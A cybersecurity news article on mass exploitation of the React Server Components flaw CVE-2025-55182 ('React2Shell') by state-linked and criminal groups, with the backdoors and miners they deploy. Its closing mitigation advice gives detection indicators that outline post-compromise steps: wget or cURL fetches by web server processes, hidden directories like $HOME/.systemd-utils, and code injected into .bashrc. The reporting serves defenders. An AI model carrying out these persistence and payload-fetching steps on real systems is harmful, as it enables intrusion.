The Next Log4Shell? Global Hackers Weaponize React2Shell for RCE and Cloud Takeovers
A critical vulnerability in the widely used JavaScript library React, dubbed React2Shell, is already being exploited at scale. According to Google, at least five newly identified Chinese espionage groups, “Iran-linked” threat actors, and common cybercriminals have joined the wave of attacks. Tracked as CVE-2025-55182, the flaw allows an unauthenticated attacker to remotely execute code on a vulnerable system—effectively turning exposed servers into entry points for backdoors, tunneling tools, and cryptocurrency miners within minutes.
The React development team disclosed the bug on December 3, and attacks began almost immediately. Amazon’s threat intelligence team reported that Chinese state-aligned groups, including Earth Lamia and Jackpot Panda, started probing the vulnerability within hours of its public disclosure. Palo Alto Networks’ Unit 42 estimates that more than 50 organizations across multiple industries have already been affected, with signs of exploitation also linked to North Korean actors.
Google further notes that, beyond previously known players, React2Shell is being actively leveraged by at least five additional groups it associates with the People’s Republic of China. Financially motivated attackers are also in the mix, deploying XMRig after compromise to conduct illicit cryptomining. In addition, Google references “Iran-linked actors,” though without specifying their identities or post-compromise objectives.
Google’s researchers also highlight heightened activity around CVE-2025-55182 on underground forums, where participants are openly discussing the vulnerability, sharing scanner links, proof-of-concept exploits, and accounts of successful attacks. In practice, this follows a familiar pattern for high-profile, “hot” vulnerabilities: once functional tooling becomes available, it is rapidly adopted by a broad spectrum of actors, ranging from espionage groups to purely criminal operations.
Within the Beijing-linked activity set, Google identifies several distinct clusters. UNC6600 exploits the flaw to deploy the Minocat tunneler and establish persistence on compromised systems. UNC6586 uses React2Shell to install the Snowlight backdoor, with telemetry revealing HTTP GET requests to command-and-control infrastructure that delivers additional payloads disguised as legitimate files.
Another cluster, UNC6588, downloads the Compood backdoor following exploitation, while UNC6603 deploys an updated version of Hisonic. According to Google Threat Intelligence, UNC6603’s activity is focused on cloud infrastructure—particularly AWS and Alibaba Cloud instances across the Asia-Pacific region. Finally, UNC6595, also linked to the PRC, abuses the vulnerability to deploy Angryrebel.Linux, primarily targeting infrastructure hosted on international VPS providers.
React’s troubles do not end there. In addition to CVE-2025-55182, three more vulnerabilities have been disclosed: CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779. These flaws enable denial-of-service attacks and, in certain scenarios, may potentially lead to the leakage of Server Function source code.
To mitigate the worst-case risks posed by all four vulnerabilities, organizations are strongly advised to patch affected React Server Components as soon as possible and to closely monitor network traffic for outbound connections matching the indicators of compromise detailed in Google’s report—particularly wget or cURL commands launched by web server processes. As additional signs of compromise, Google recommends hunting for newly created hidden directories such as $HOME/.systemd-utils, unauthorized termination of processes including ntpclient, and the injection of malicious execution logic into shell configuration files, for example $HOME/.bashrc.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
